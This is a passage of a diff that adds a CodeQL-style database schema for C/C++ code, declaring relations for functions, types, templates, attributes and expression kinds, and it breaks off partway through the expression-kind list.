__builtin___memcpy_chk +| 7 = @user_defined_literal +| 8 = @deduction_guide +; + +functions( + unique int id: @function, + string name: string ref, + int kind: int ref +); + +builtin_functions( + int id: @function ref +) + +function_entry_point( + int id: @function ref, + unique int entry_point: @stmt ref +); + +function_return_type( + int id: @function ref, + int return_type: @type ref +); + +/** + * If `function` is a coroutine, then this gives the `std::experimental::resumable_traits` + * instance associated with it, and the variables representing the `handle` and `promise` + * for it. + */ +coroutine( + unique int function: @function ref, + int traits: @type ref +); + +/* +case @coroutine_placeholder_variable.kind of + 1 = @handle +| 2 = @promise +| 3 = @init_await_resume +; +*/ + +coroutine_placeholder_variable( + unique int placeholder_variable: @variable ref, + int kind: int ref, + int function: @function ref +) + +/** The `new` function used for allocating the coroutine state, if any. */ +coroutine_new( + unique int function: @function ref, + int new: @function ref +); + +/** The `delete` function used for deallocating the coroutine state, if any. 
*/ +coroutine_delete( + unique int function: @function ref, + int delete: @function ref +); + +purefunctions(unique int id: @function ref); + +function_deleted(unique int id: @function ref); + +function_defaulted(unique int id: @function ref); + +function_prototyped(unique int id: @function ref) + +deduction_guide_for_class( + int id: @function ref, + int class_template: @usertype ref +) + +member_function_this_type( + unique int id: @function ref, + int this_type: @type ref +); + +#keyset[id, type_id] +fun_decls( + int id: @fun_decl, + int function: @function ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +fun_def(unique int id: @fun_decl ref); +fun_specialized(unique int id: @fun_decl ref); +fun_implicit(unique int id: @fun_decl ref); +fun_decl_specifiers( + int id: @fun_decl ref, + string name: string ref +) +#keyset[fun_decl, index] +fun_decl_throws( + int fun_decl: @fun_decl ref, + int index: int ref, + int type_id: @type ref +); +/* an empty throw specification is different from none */ +fun_decl_empty_throws(unique int fun_decl: @fun_decl ref); +fun_decl_noexcept( + int fun_decl: @fun_decl ref, + int constant: @expr ref +); +fun_decl_empty_noexcept(int fun_decl: @fun_decl ref); +fun_decl_typedef_type( + unique int fun_decl: @fun_decl ref, + int typedeftype_id: @usertype ref +); + +/* +case @fun_requires.kind of + 1 = @template_attached +| 2 = @function_attached +; +*/ + +fun_requires( + int id: @fun_decl ref, + int kind: int ref, + int constraint: @expr ref +); + +param_decl_bind( + unique int id: @var_decl ref, + int index: int ref, + int fun_decl: @fun_decl ref +); + +#keyset[id, type_id] +var_decls( + int id: @var_decl, + int variable: @variable ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +var_def(unique int id: @var_decl ref); +var_specialized(int id: @var_decl ref); +var_decl_specifiers( + int id: @var_decl ref, + string name: string ref +) 
+is_structured_binding(unique int id: @variable ref); +var_requires( + int id: @var_decl ref, + int constraint: @expr ref +); + +type_decls( + unique int id: @type_decl, + int type_id: @type ref, + int location: @location_default ref +); +type_def(unique int id: @type_decl ref); +type_decl_top( + unique int type_decl: @type_decl ref +); +type_requires( + int id: @type_decl ref, + int constraint: @expr ref +); + +namespace_decls( + unique int id: @namespace_decl, + int namespace_id: @namespace ref, + int location: @location_default ref, + int bodylocation: @location_default ref +); + +case @using.kind of + 1 = @using_declaration +| 2 = @using_directive +| 3 = @using_enum_declaration +; + +usings( + unique int id: @using, + int element_id: @element ref, + int location: @location_default ref, + int kind: int ref +); + +/** The element which contains the `using` declaration. */ +using_container( + int parent: @element ref, + int child: @using ref +); + +static_asserts( + unique int id: @static_assert, + int condition : @expr ref, + string message : string ref, + int location: @location_default ref, + int enclosing : @element ref +); + +// each function has an ordered list of parameters +#keyset[id, type_id] +#keyset[function, index, type_id] +params( + int id: @parameter, + int function: @parameterized_element ref, + int index: int ref, + int type_id: @type ref +); + +overrides( + int new: @function ref, + int old: @function ref +); + +#keyset[id, type_id] +membervariables( + int id: @membervariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +globalvariables( + int id: @globalvariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +localvariables( + int id: @localvariable, + int type_id: @type ref, + string name: string ref +); + +autoderivation( + unique int var: @variable ref, + int derivation_type: @type ref +); + +orphaned_variables( + int var: @localvariable ref, + int function: @function ref 
+) + +enumconstants( + unique int id: @enumconstant, + int parent: @usertype ref, + int index: int ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); + +@variable = @localscopevariable | @globalvariable | @membervariable; + +@localscopevariable = @localvariable | @parameter; + +/** + * Built-in types are the fundamental types, e.g., integral, floating, and void. + */ +case @builtintype.kind of + 1 = @errortype +| 2 = @unknowntype +| 3 = @void +| 4 = @boolean +| 5 = @char +| 6 = @unsigned_char +| 7 = @signed_char +| 8 = @short +| 9 = @unsigned_short +| 10 = @signed_short +| 11 = @int +| 12 = @unsigned_int +| 13 = @signed_int +| 14 = @long +| 15 = @unsigned_long +| 16 = @signed_long +| 17 = @long_long +| 18 = @unsigned_long_long +| 19 = @signed_long_long +// ... 20 Microsoft-specific __int8 +// ... 21 Microsoft-specific __int16 +// ... 22 Microsoft-specific __int32 +// ... 23 Microsoft-specific __int64 +| 24 = @float +| 25 = @double +| 26 = @long_double +| 27 = @complex_float // C99-specific _Complex float +| 28 = @complex_double // C99-specific _Complex double +| 29 = @complex_long_double // C99-specific _Complex long double +| 30 = @imaginary_float // C99-specific _Imaginary float +| 31 = @imaginary_double // C99-specific _Imaginary double +| 32 = @imaginary_long_double // C99-specific _Imaginary long double +| 33 = @wchar_t // Microsoft-specific +| 34 = @decltype_nullptr // C++11 +| 35 = @int128 // __int128 +| 36 = @unsigned_int128 // unsigned __int128 +| 37 = @signed_int128 // signed __int128 +| 38 = @float128 // __float128 +| 39 = @complex_float128 // _Complex __float128 +// ... 40 _Decimal32 +// ... 41 _Decimal64 +// ... 42 _Decimal128 +| 43 = @char16_t +| 44 = @char32_t +| 45 = @std_float32 // _Float32 +| 46 = @float32x // _Float32x +| 47 = @std_float64 // _Float64 +| 48 = @float64x // _Float64x +| 49 = @std_float128 // _Float128 +// ... 
50 _Float128x +| 51 = @char8_t +| 52 = @float16 // _Float16 +| 53 = @complex_float16 // _Complex _Float16 +| 54 = @fp16 // __fp16 +| 55 = @std_bfloat16 // __bf16 +| 56 = @std_float16 // std::float16_t +| 57 = @complex_std_float32 // _Complex _Float32 +| 58 = @complex_float32x // _Complex _Float32x +| 59 = @complex_std_float64 // _Complex _Float64 +| 60 = @complex_float64x // _Complex _Float64x +| 61 = @complex_std_float128 // _Complex _Float128 +| 62 = @mfp8 // __mfp8 +| 63 = @scalable_vector_count // __SVCount_t +| 64 = @complex_fp16 // _Complex __fp16 +| 65 = @complex_std_bfloat16 // _Complex __bf16 +| 66 = @complex_std_float16 // _Complex std::float16_t +; + +builtintypes( + unique int id: @builtintype, + string name: string ref, + int kind: int ref, + int size: int ref, + int sign: int ref, + int alignment: int ref +); + +/** + * Derived types are types that are directly derived from existing types and + * point to, refer to, transform type data to return a new type. + */ +case @derivedtype.kind of + 1 = @pointer +| 2 = @reference +| 3 = @type_with_specifiers +| 4 = @array +| 5 = @gnu_vector +| 6 = @routineptr +| 7 = @routinereference +| 8 = @rvalue_reference // C++11 +// ... 9 type_conforming_to_protocols deprecated +| 10 = @block +| 11 = @scalable_vector // Arm SVE +; + +derivedtypes( + unique int id: @derivedtype, + string name: string ref, + int kind: int ref, + int type_id: @type ref +); + +pointerishsize(unique int id: @derivedtype ref, + int size: int ref, + int alignment: int ref); + +arraysizes( + unique int id: @derivedtype ref, + int num_elements: int ref, + int bytesize: int ref, + int alignment: int ref +); + +tupleelements( + unique int id: @derivedtype ref, + int num_elements: int ref +); + +typedefbase( + unique int id: @usertype ref, + int type_id: @type ref +); + +/** + * An instance of the C++11 `decltype` operator or C23 `typeof`/`typeof_unqual` + * operator taking an expression as its argument. 
For example: + * ``` + * int a; + * decltype(1+a) b; + * typeof(1+a) c; + * ``` + * Here `expr` is `1+a`. + * + * Sometimes an additional pair of parentheses around the expression + * changes the semantics of the decltype, e.g. + * ``` + * struct A { double x; }; + * const A* a = new A(); + * decltype( a->x ); // type is double + * decltype((a->x)); // type is const double& + * ``` + * (Please consult the C++11 standard for more details). + * `parentheses_would_change_meaning` is `true` iff that is the case. + */ + +/* +case @decltype.kind of +| 0 = @decltype +| 1 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +; +*/ + +#keyset[id, expr] +decltypes( + int id: @decltype, + int expr: @expr ref, + int kind: int ref, + int base_type: @type ref, + boolean parentheses_would_change_meaning: boolean ref +); + +case @type_operator.kind of + 0 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +| 1 = @underlying_type +| 2 = @bases +| 3 = @direct_bases +| 4 = @add_lvalue_reference +| 5 = @add_pointer +| 6 = @add_rvalue_reference +| 7 = @decay +| 8 = @make_signed +| 9 = @make_unsigned +| 10 = @remove_all_extents +| 11 = @remove_const +| 12 = @remove_cv +| 13 = @remove_cvref +| 14 = @remove_extent +| 15 = @remove_pointer +| 16 = @remove_reference_t +| 17 = @remove_restrict +| 18 = @remove_volatile +| 19 = @remove_reference +; + +type_operators( + unique int id: @type_operator, + int arg_type: @type ref, + int kind: int ref, + int base_type: @type ref +) + +case @usertype.kind of + 0 = @unknown_usertype +| 1 = @struct +| 2 = @class +| 3 = @union +| 4 = @enum +// ... 5 = @typedef deprecated // classic C: typedef typedef type name +// ... 6 = @template deprecated +| 7 = @template_parameter +| 8 = @template_template_parameter +| 9 = @proxy_class // a proxy class associated with a template parameter +// ... 10 objc_class deprecated +// ... 11 objc_protocol deprecated +// ... 
12 objc_category deprecated +| 13 = @scoped_enum +// ... 14 = @using_alias deprecated // a using name = type style typedef +| 15 = @template_struct +| 16 = @template_class +| 17 = @template_union +| 18 = @alias +; + +usertypes( + unique int id: @usertype, + string name: string ref, + int kind: int ref +); + +usertypesize( + unique int id: @usertype ref, + int size: int ref, + int alignment: int ref +); + +usertype_final(unique int id: @usertype ref); + +usertype_uuid( + unique int id: @usertype ref, + string uuid: string ref +); + +/* +case @usertype.alias_kind of +| 0 = @typedef +| 1 = @alias +*/ + +usertype_alias_kind( + int id: @usertype ref, + int alias_kind: int ref +) + +nontype_template_parameters( + int id: @expr ref +); + +type_template_type_constraint( + int id: @usertype ref, + int constraint: @expr ref +); + +mangled_name( + unique int id: @declaration ref, + int mangled_name : @mangledname, + boolean is_complete: boolean ref +); + +is_pod_class(unique int id: @usertype ref); +is_standard_layout_class(unique int id: @usertype ref); + +is_complete(unique int id: @usertype ref); + +is_class_template(unique int id: @usertype ref); +class_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +class_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +class_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +class_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +) + +@user_or_decltype = @usertype | @decltype; + +is_proxy_class_for( + unique int id: @usertype ref, + int templ_param_id: @user_or_decltype ref +); + +type_mentions( + unique int id: @type_mention, + int type_id: @type ref, + int location: @location_default ref, + // a_symbol_reference_kind from the frontend. 
+ int kind: int ref +); + +is_function_template(unique int id: @function ref); +function_instantiation( + unique int to: @function ref, + int from: @function ref +); +function_template_argument( + int function_id: @function ref, + int index: int ref, + int arg_type: @type ref +); +function_template_argument_value( + int function_id: @function ref, + int index: int ref, + int arg_value: @expr ref +); +function_template_generated_from( + unique int template: @function ref, + int from: @function ref +); + +is_variable_template(unique int id: @variable ref); +variable_instantiation( + unique int to: @variable ref, + int from: @variable ref +); +variable_template_argument( + int variable_id: @variable ref, + int index: int ref, + int arg_type: @type ref +); +variable_template_argument_value( + int variable_id: @variable ref, + int index: int ref, + int arg_value: @expr ref +); +variable_template_generated_from( + unique int template: @variable ref, + int from: @variable ref +); + +is_alias_template(unique int id: @usertype ref); +alias_instantiation( + unique int to: @usertype ref, + int from: @usertype ref +); +alias_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +alias_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +alias_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +); + +template_template_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +template_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +template_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); + +@concept = @concept_template | @concept_id; + +concept_templates( + unique int concept_id: @concept_template, + string name: string ref, + int location: @location_default ref +); +concept_instantiation( + unique int to: 
@concept_id ref, + int from: @concept_template ref +); +is_type_constraint(int concept_id: @concept_id ref); +concept_template_argument( + int concept_id: @concept ref, + int index: int ref, + int arg_type: @type ref +); +concept_template_argument_value( + int concept_id: @concept ref, + int index: int ref, + int arg_value: @expr ref +); + +routinetypes( + unique int id: @routinetype, + int return_type: @type ref +); + +routinetypeargs( + int routine: @routinetype ref, + int index: int ref, + int type_id: @type ref +); + +ptrtomembers( + unique int id: @ptrtomember, + int type_id: @type ref, + int class_id: @type ref +); + +/* + specifiers for types, functions, and variables + + "public", + "protected", + "private", + + "const", + "volatile", + "static", + + "pure", + "virtual", + "sealed", // Microsoft + "__interface", // Microsoft + "inline", + "explicit", + + "near", // near far extension + "far", // near far extension + "__ptr32", // Microsoft + "__ptr64", // Microsoft + "__sptr", // Microsoft + "__uptr", // Microsoft + "dllimport", // Microsoft + "dllexport", // Microsoft + "thread", // Microsoft + "naked", // Microsoft + "microsoft_inline", // Microsoft + "forceinline", // Microsoft + "selectany", // Microsoft + "nothrow", // Microsoft + "novtable", // Microsoft + "noreturn", // Microsoft + "noinline", // Microsoft + "noalias", // Microsoft + "restrict", // Microsoft +*/ + +specifiers( + unique int id: @specifier, + unique string str: string ref +); + +typespecifiers( + int type_id: @type ref, + int spec_id: @specifier ref +); + +funspecifiers( + int func_id: @function ref, + int spec_id: @specifier ref +); + +varspecifiers( + int var_id: @accessible ref, + int spec_id: @specifier ref +); + +explicit_specifier_exprs( + unique int func_id: @function ref, + int constant: @expr ref +) + +attributes( + unique int id: @attribute, + int kind: int ref, + string name: string ref, + string name_space: string ref, + int location: @location_default ref +); + +case 
@attribute.kind of + 0 = @gnuattribute +| 1 = @stdattribute +| 2 = @declspec +| 3 = @msattribute +| 4 = @alignas +// ... 5 @objc_propertyattribute deprecated +; + +attribute_args( + unique int id: @attribute_arg, + int kind: int ref, + int attribute: @attribute ref, + int index: int ref, + int location: @location_default ref +); + +case @attribute_arg.kind of + 0 = @attribute_arg_empty +| 1 = @attribute_arg_token +| 2 = @attribute_arg_constant +| 3 = @attribute_arg_type +| 4 = @attribute_arg_constant_expr +| 5 = @attribute_arg_expr +; + +attribute_arg_value( + unique int arg: @attribute_arg ref, + string value: string ref +); +attribute_arg_type( + unique int arg: @attribute_arg ref, + int type_id: @type ref +); +attribute_arg_constant( + unique int arg: @attribute_arg ref, + int constant: @expr ref +) +attribute_arg_expr( + unique int arg: @attribute_arg ref, + int expr: @expr ref +) +attribute_arg_name( + unique int arg: @attribute_arg ref, + string name: string ref +); + +typeattributes( + int type_id: @type ref, + int spec_id: @attribute ref +); + +funcattributes( + int func_id: @function ref, + int spec_id: @attribute ref +); + +varattributes( + int var_id: @accessible ref, + int spec_id: @attribute ref +); + +namespaceattributes( + int namespace_id: @namespace ref, + int spec_id: @attribute ref +); + +stmtattributes( + int stmt_id: @stmt ref, + int spec_id: @attribute ref +); + +@type = @builtintype + | @derivedtype + | @usertype + | @routinetype + | @ptrtomember + | @decltype + | @type_operator; + +unspecifiedtype( + unique int type_id: @type ref, + int unspecified_type_id: @type ref +); + +member( + int parent: @type ref, + int index: int ref, + int child: @member ref +); + +@enclosingfunction_child = @usertype | @variable | @namespace + +enclosingfunction( + unique int child: @enclosingfunction_child ref, + int parent: @function ref +); + +derivations( + unique int derivation: @derivation, + int sub: @type ref, + int index: int ref, + int super: @type ref, 
+ int location: @location_default ref +); + +derspecifiers( + int der_id: @derivation ref, + int spec_id: @specifier ref +); + +/** + * Contains the byte offset of the base class subobject within the derived + * class. Only holds for non-virtual base classes, but see table + * `virtual_base_offsets` for offsets of virtual base class subobjects. + */ +direct_base_offsets( + unique int der_id: @derivation ref, + int offset: int ref +); + +/** + * Contains the byte offset of the virtual base class subobject for class + * `super` within a most-derived object of class `sub`. `super` can be either a + * direct or indirect base class. + */ +#keyset[sub, super] +virtual_base_offsets( + int sub: @usertype ref, + int super: @usertype ref, + int offset: int ref +); + +frienddecls( + unique int id: @frienddecl, + int type_id: @type ref, + int decl_id: @declaration ref, + int location: @location_default ref +); + +@declaredtype = @usertype ; + +@declaration = @function + | @declaredtype + | @variable + | @enumconstant + | @frienddecl + | @concept_template; + +@member = @membervariable + | @function + | @declaredtype + | @enumconstant; + +@locatable = @diagnostic + | @declaration + | @ppd_include + | @ppd_define + | @macroinvocation + /*| @funcall*/ + | @xmllocatable + | @attribute + | @attribute_arg; + +@namedscope = @namespace | @usertype; + +@element = @locatable + | @file + | @folder + | @specifier + | @type + | @expr + | @namespace + | @initialiser + | @stmt + | @derivation + | @comment + | @preprocdirect + | @fun_decl + | @var_decl + | @type_decl + | @namespace_decl + | @using + | @namequalifier + | @specialnamequalifyingelement + | @static_assert + | @type_mention + | @lambdacapture; + +@exprparent = @element; + +comments( + unique int id: @comment, + string contents: string ref, + int location: @location_default ref +); + +commentbinding( + int id: @comment ref, + int element: @element ref +); + +exprconv( + int converted: @expr ref, + unique int conversion: @expr ref 
+); + +compgenerated(unique int id: @element ref); + +/** + * `destructor_call` destructs the `i`'th entity that should be + * destructed following `element`. Note that entities should be + * destructed in reverse construction order, so for a given `element` + * these should be called from highest to lowest `i`. + */ +#keyset[element, destructor_call] +#keyset[element, i] +synthetic_destructor_call( + int element: @element ref, + int i: int ref, + int destructor_call: @routineexpr ref +); + +namespaces( + unique int id: @namespace, + string name: string ref +); + +namespace_inline( + unique int id: @namespace ref +); + +namespacembrs( + int parentid: @namespace ref, + unique int memberid: @namespacembr ref +); + +@namespacembr = @declaration | @namespace; + +exprparents( + int expr_id: @expr ref, + int child_index: int ref, + int parent_id: @exprparent ref +); + +expr_isload(unique int expr_id: @expr ref); + +@cast = @c_style_cast + | @const_cast + | @dynamic_cast + | @reinterpret_cast + | @static_cast + ; + +/* +case @conversion.kind of + 0 = @simple_conversion // a numeric conversion, qualification conversion, or a reinterpret_cast +| 1 = @bool_conversion // conversion to 'bool' +| 2 = @base_class_conversion // a derived-to-base conversion +| 3 = @derived_class_conversion // a base-to-derived conversion +| 4 = @pm_base_class_conversion // a derived-to-base conversion of a pointer to member +| 5 = @pm_derived_class_conversion // a base-to-derived conversion of a pointer to member +| 6 = @glvalue_adjust // an adjustment of the type of a glvalue +| 7 = @prvalue_adjust // an adjustment of the type of a prvalue +; +*/ +/** + * Describes the semantics represented by a cast expression. This is largely + * independent of the source syntax of the cast, so it is separate from the + * regular expression kind. 
+ */ +conversionkinds( + unique int expr_id: @cast ref, + int kind: int ref +); + +@conversion = @cast + | @array_to_pointer + | @parexpr + | @reference_to + | @ref_indirect + | @temp_init + | @c11_generic + ; + +/* +case @funbindexpr.kind of + 0 = @normal_call // a normal call +| 1 = @virtual_call // a virtual call +| 2 = @adl_call // a call whose target is only found by ADL +; +*/ +iscall( + unique int caller: @funbindexpr ref, + int kind: int ref +); + +numtemplatearguments( + unique int expr_id: @expr ref, + int num: int ref +); + +specialnamequalifyingelements( + unique int id: @specialnamequalifyingelement, + unique string name: string ref +); + +@namequalifiableelement = @expr | @namequalifier; +@namequalifyingelement = @namespace + | @specialnamequalifyingelement + | @usertype + | @decltype; + +namequalifiers( + unique int id: @namequalifier, + unique int qualifiableelement: @namequalifiableelement ref, + int qualifyingelement: @namequalifyingelement ref, + int location: @location_default ref +); + +varbind( + int expr: @varbindexpr ref, + int var: @accessible ref +); + +funbind( + int expr: @funbindexpr ref, + int fun: @function ref +); + +@any_new_expr = @new_expr + | @new_array_expr; + +@new_or_delete_expr = @any_new_expr + | @delete_expr + | @delete_array_expr; + +@prefix_crement_expr = @preincrexpr | @predecrexpr; + +@postfix_crement_expr = @postincrexpr | @postdecrexpr; + +@increment_expr = @preincrexpr | @postincrexpr; + +@decrement_expr = @predecrexpr | @postdecrexpr; + +@crement_expr = @increment_expr | @decrement_expr; + +@un_arith_op_expr = @arithnegexpr + | @unaryplusexpr + | @conjugation + | @realpartexpr + | @imagpartexpr + | @crement_expr + ; + +@un_bitwise_op_expr = @complementexpr; + +@un_log_op_expr = @notexpr; + +@un_op_expr = @address_of + | @indirect + | @un_arith_op_expr + | @un_bitwise_op_expr + | @builtinaddressof + | @vec_fill + | @un_log_op_expr + | @co_await + | @co_yield + ; + +@bin_log_op_expr = @andlogicalexpr | @orlogicalexpr; 
+ +@cmp_op_expr = @eq_op_expr | @rel_op_expr; + +@eq_op_expr = @eqexpr | @neexpr; + +@rel_op_expr = @gtexpr + | @ltexpr + | @geexpr + | @leexpr + | @spaceshipexpr + ; + +@bin_bitwise_op_expr = @lshiftexpr + | @rshiftexpr + | @andexpr + | @orexpr + | @xorexpr + ; + +@p_arith_op_expr = @paddexpr + | @psubexpr + | @pdiffexpr + ; + +@bin_arith_op_expr = @addexpr + | @subexpr + | @mulexpr + | @divexpr + | @remexpr + | @jmulexpr + | @jdivexpr + | @fjaddexpr + | @jfaddexpr + | @fjsubexpr + | @jfsubexpr + | @minexpr + | @maxexpr + | @p_arith_op_expr + ; + +@bin_op_expr = @bin_arith_op_expr + | @bin_bitwise_op_expr + | @cmp_op_expr + | @bin_log_op_expr + ; + +@op_expr = @un_op_expr + | @bin_op_expr + | @assign_expr + | @conditionalexpr + ; + +@assign_arith_expr = @assignaddexpr + | @assignsubexpr + | @assignmulexpr + | @assigndivexpr + | @assignremexpr + ; + +@assign_bitwise_expr = @assignandexpr + | @assignorexpr + | @assignxorexpr + | @assignlshiftexpr + | @assignrshiftexpr + ; + +@assign_pointer_expr = @assignpaddexpr + | @assignpsubexpr + ; + +@assign_op_expr = @assign_arith_expr + | @assign_bitwise_expr + | @assign_pointer_expr + ; + +@assign_expr = @assignexpr | @assign_op_expr | @blockassignexpr + +/* + Binary encoding of the allocator form. + + case @allocator.form of + 0 = plain + | 1 = alignment + ; +*/ + +/** + * The allocator function associated with a `new` or `new[]` expression. + * The `form` column specified whether the allocation call contains an alignment + * argument. + */ +expr_allocator( + unique int expr: @any_new_expr ref, + int func: @function ref, + int form: int ref +); + +/* + Binary encoding of the deallocator form. + + case @deallocator.form of + 0 = plain + | 1 = size + | 2 = alignment + | 4 = destroying_delete + ; +*/ + +/** + * The deallocator function associated with a `delete`, `delete[]`, `new`, or + * `new[]` expression. 
For a `new` or `new[]` expression, the deallocator is the + * one used to free memory if the initialization throws an exception. + * The `form` column specifies whether the deallocation call contains a size + * argument, and alignment argument, or both. + */ +expr_deallocator( + unique int expr: @new_or_delete_expr ref, + int func: @function ref, + int form: int ref +); + +/** + * Holds if the `@conditionalexpr` is of the two operand form + * `guard ? : false`. + */ +expr_cond_two_operand( + unique int cond: @conditionalexpr ref +); + +/** + * The guard of `@conditionalexpr` `guard ? true : false` + */ +expr_cond_guard( + unique int cond: @conditionalexpr ref, + int guard: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` holds. For the two operand form + * `guard ?: false` consider using `expr_cond_guard` instead. + */ +expr_cond_true( + unique int cond: @conditionalexpr ref, + int true: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` does not hold. + */ +expr_cond_false( + unique int cond: @conditionalexpr ref, + int false: @expr ref +); + +/** A string representation of the value. */ +values( + unique int id: @value, + string str: string ref +); + +/** The actual text in the source code for the value, if any. 
*/ +valuetext( + unique int id: @value ref, + string text: string ref +); + +valuebind( + int val: @value ref, + unique int expr: @expr ref +); + +fieldoffsets( + unique int id: @variable ref, + int byteoffset: int ref, + int bitoffset: int ref +); + +bitfield( + unique int id: @variable ref, + int bits: int ref, + int declared_bits: int ref +); + +/* TODO +memberprefix( + int member: @expr ref, + int prefix: @expr ref +); +*/ + +/* + kind(1) = mbrcallexpr + kind(2) = mbrptrcallexpr + kind(3) = mbrptrmbrcallexpr + kind(4) = ptrmbrptrmbrcallexpr + kind(5) = mbrreadexpr // x.y + kind(6) = mbrptrreadexpr // p->y + kind(7) = mbrptrmbrreadexpr // x.*pm + kind(8) = mbrptrmbrptrreadexpr // x->*pm + kind(9) = staticmbrreadexpr // static x.y + kind(10) = staticmbrptrreadexpr // static p->y +*/ +/* TODO +memberaccess( + int member: @expr ref, + int kind: int ref +); +*/ + +initialisers( + unique int init: @initialiser, + int var: @accessible ref, + unique int expr: @expr ref, + int location: @location_default ref +); + +braced_initialisers( + int init: @initialiser ref +); + +/** + * An ancestor for the expression, for cases in which we cannot + * otherwise find the expression's parent. + */ +expr_ancestor( + int exp: @expr ref, + int ancestor: @element ref +); + +exprs( + unique int id: @expr, + int kind: int ref, + int location: @location_default ref +); + +expr_reuse( + int reuse: @expr ref, + int original: @expr ref, + int value_category: int ref +) + +/* + case @value.category of + 1 = prval + | 2 = xval + | 3 = lval + ; +*/ +expr_types( + int id: @expr ref, + int typeid: @type ref, + int value_category: int ref +); + +case @expr.kind of + 1 = @errorexpr +| 2 = @address_of // & AddressOfExpr +| 3 = @reference_to // ReferenceToExpr (implicit?) +| 4 = @indirect // * PointerDereferenceExpr +| 5 = @ref_indirect // ReferenceDereferenceExpr (implicit?) +// ... +| 8 = @array_to_pointer // (???) +| 9 = @vacuous_destructor_call // VacuousDestructorCall +// ... 
+| 11 = @assume // Microsoft +| 12 = @parexpr +| 13 = @arithnegexpr +| 14 = @unaryplusexpr +| 15 = @complementexpr +| 16 = @notexpr +| 17 = @conjugation // GNU ~ operator +| 18 = @realpartexpr // GNU __real +| 19 = @imagpartexpr // GNU __imag +| 20 = @postincrexpr +| 21 = @postdecrexpr +| 22 = @preincrexpr +| 23 = @predecrexpr +| 24 = @conditionalexpr +| 25 = @addexpr +| 26 = @subexpr +| 27 = @mulexpr +| 28 = @divexpr +| 29 = @remexpr +| 30 = @jmulexpr // C99 mul imaginary +| 31 = @jdivexpr // C99 div imaginary +| 32 = @fjaddexpr // C99 add real + imaginary +| 33 = @jfaddexpr // C99 add imaginary + real +| 34 = @fjsubexpr // C99 sub real - imaginary +| 35 = @jfsubexpr // C99 sub imaginary - real +| 36 = @paddexpr // pointer add (pointer + int or int + pointer) +| 37 = @psubexpr // pointer sub (pointer - integer) +| 38 = @pdiffexpr // difference between two pointers +| 39 = @lshiftexpr +| 40 = @rshiftexpr +| 41 = @andexpr +| 42 = @orexpr +| 43 = @xorexpr +| 44 = @eqexpr +| 45 = @neexpr +| 46 = @gtexpr +| 47 = @ltexpr +| 48 = @geexpr +| 49 = @leexpr +| 50 = @minexpr // GNU minimum +| 51 = @maxexpr // GNU maximum +| 52 = @assignexpr +| 53 = @assignaddexpr +| 54 = @assignsubexpr +| 55 = @assignmulexpr +| 56 = @assigndivexpr +| 57 = @assignremexpr +| 58 = @assignlshiftexpr +| 59 = @assignrshiftexpr +| 60 = @assignandexpr +| 61 = @assignorexpr +| 62 = @assignxorexpr +| 63 = @assignpaddexpr // assign pointer add +| 64 = @assignpsubexpr // assign pointer sub +| 65 = @andlogicalexpr +| 66 = @orlogicalexpr +| 67 = @commaexpr +| 68 = @subscriptexpr // access to member of an array, e.g., a[5] +// ... 69 @objc_subscriptexpr deprecated +// ... 70 @cmdaccess deprecated +// ... +| 73 = @virtfunptrexpr +| 74 = @callexpr +// ... 75 @msgexpr_normal deprecated +// ... 76 @msgexpr_super deprecated +// ... 77 @atselectorexpr deprecated +// ... 78 @atprotocolexpr deprecated +| 79 = @vastartexpr +| 80 = @vaargexpr +| 81 = @vaendexpr +| 82 = @vacopyexpr +// ... 
83 @atencodeexpr deprecated +| 84 = @varaccess +| 85 = @thisaccess +// ... 86 @objc_box_expr deprecated +| 87 = @new_expr +| 88 = @delete_expr +| 89 = @throw_expr +| 90 = @condition_decl // a variable declared in a condition, e.g., if(int x = y > 2) +| 91 = @braced_init_list +| 92 = @type_id +| 93 = @runtime_sizeof +| 94 = @runtime_alignof +| 95 = @sizeof_pack +| 96 = @expr_stmt // GNU extension +| 97 = @routineexpr +| 98 = @type_operand // used to access a type in certain contexts (haven't found any examples yet....) +| 99 = @offsetofexpr // offsetof ::= type and field +| 100 = @hasassignexpr // __has_assign ::= type +| 101 = @hascopyexpr // __has_copy ::= type +| 102 = @hasnothrowassign // __has_nothrow_assign ::= type +| 103 = @hasnothrowconstr // __has_nothrow_constructor ::= type +| 104 = @hasnothrowcopy // __has_nothrow_copy ::= type +| 105 = @hastrivialassign // __has_trivial_assign ::= type +| 106 = @hastrivialconstr // __has_trivial_constructor ::= type +| 107 = @hastrivialcopy // __has_trivial_copy ::= type +| 108 = @hasuserdestr // __has_user_destructor ::= type +| 109 = @hasvirtualdestr // __has_virtual_destructor ::= type +| 110 = @isabstractexpr // __is_abstract ::= type +| 111 = @isbaseofexpr // __is_base_of ::= type type +| 112 = @isclassexpr // __is_class ::= type +| 113 = @isconvtoexpr // __is_convertible_to ::= type type +| 114 = @isemptyexpr // __is_empty ::= type +| 115 = @isenumexpr // __is_enum ::= type +| 116 = @ispodexpr // __is_pod ::= type +| 117 = @ispolyexpr // __is_polymorphic ::= type +| 118 = @isunionexpr // __is_union ::= type +| 119 = @typescompexpr // GNU __builtin_types_compatible ::= type type +| 120 = @intaddrexpr // frontend internal builtin, used to implement offsetof +// ... +| 122 = @hastrivialdestructor // __has_trivial_destructor ::= type +| 123 = @literal +| 124 = @uuidof +| 127 = @aggregateliteral +| 128 = @delete_array_expr +| 129 = @new_array_expr +// ... 130 @objc_array_literal deprecated +// ... 
